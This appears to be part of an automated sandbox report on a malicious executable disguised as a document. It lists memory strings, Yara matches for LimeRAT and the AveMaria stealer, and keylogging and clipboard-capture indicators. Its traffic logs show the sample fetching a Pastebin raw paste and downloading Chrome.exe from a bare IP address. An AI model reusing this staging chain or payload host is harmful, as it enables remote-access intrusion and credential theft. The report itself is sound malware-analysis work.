Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: wtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83503822976.0000000002C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Chrome.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.111.242.20Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected LimeRAT
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Installs a raw input device (often for capturing keystrokes)
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
